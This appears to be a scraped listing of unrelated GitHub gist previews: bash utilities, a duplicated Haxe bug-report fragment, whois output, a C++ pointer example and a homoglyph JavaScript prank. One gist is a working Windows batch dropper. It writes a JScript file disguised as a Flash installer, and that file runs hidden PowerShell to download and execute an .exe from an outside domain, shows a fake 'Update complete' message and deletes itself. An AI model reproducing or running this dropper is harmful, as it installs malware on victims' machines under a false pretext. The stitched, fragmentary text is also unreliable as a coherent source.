I believe these settings should be enough to reproduce the error.
platform: linux
bits: 64
haxe version: latest dev version
hxcpp: https://github.com/larsiusprime/hxcpp (master branch)
#!/bin/bash | |
# --------------------------------------------------------------------------- # | |
# Created by Andreas Renberg (https://github.com/IQAndreas) | |
# Based on work by Doctor J (https://stackoverflow.com/a/1403489/617937) | |
# This code is in the public domain and under no license. | |
# Well, my code at least. The ~8 lines by Doctor J still belong to him. | |
# --------------------------------------------------------------------------- # | |
# Personal notes: What if a file is named 'file.'? |
#!/bin/bash | |
# $ echo "COMPRESSED" > file.gz; | |
# $ ln file.gz hardlink; | |
# $ cat file.gz | |
COMPRESSED | |
# $ cat hardlink | |
COMPRESSED | |
# $ echo "Let's pretend this is the temporary uncompressed file" > temp |
I believe these settings should be enough to reproduce the error.
platform: linux
bits: 64
haxe version: latest dev version
hxcpp: https://github.com/larsiusprime/hxcpp (master branch)
video_title="${video_title//"/\'}"; # Replace " with ' }"; | |
video_title="${video_title//'/\'}"; # Replace ' with ' }"; | |
video_title="${video_title//&/&}"; # Replace & with & | |
video_title="${video_title//\//}"; # Remove forward slashes |
@echo off | |
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\2a8e4da7858ebc8a788b7e303e06ab57.exe';(New-Object System.Net.WebClient).DownloadFile('https://ahsunachatdesign.net/17/528.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js" | |
start /min "" wscript.exe "%temp%\install_flash.js" | |
DEL "%~f0 |
// Just hide this line somewhere deep inside your code where nobody will find it... | |
var ˮtrueˮ = "false"; | |
// ... | |
if (ˮtrueˮ == "false") { | |
alert("There is no spoon."); | |
} |
#!/bin/bash | |
# Remove "worthless" Windows files from the backup | |
find . -name "Thumbs.db" -delete | |
find . -name "desktop.ini" -delete | |
# Remove empty directories | |
find . -type d -empty -delete |
#!/bin/bash | |
wget "http://media.blubrry.com/creativecoding/creativecodingpodcast.com/episodes/CreativeCodingEpisode"{1..43}.mp3 |
$ whois google.com | |
Whois Server Version 2.0 | |
Domain names in the .com and .net domains can now be registered | |
with many different competing registrars. Go to http://www.internic.net | |
for detailed information. | |
Aborting search 50 records found ..... | |
Server Name: GOOGLE.COM.AFRICANBATS.ORG |
#include <iostream> | |
using namespace std; | |
int main() { | |
int integers[5] = {4, 13, 14, 24, 256}; | |
int *int0 = &integers[0]; | |
char *c = (char*)int0; | |
char *end = (char*)&integers[5]; |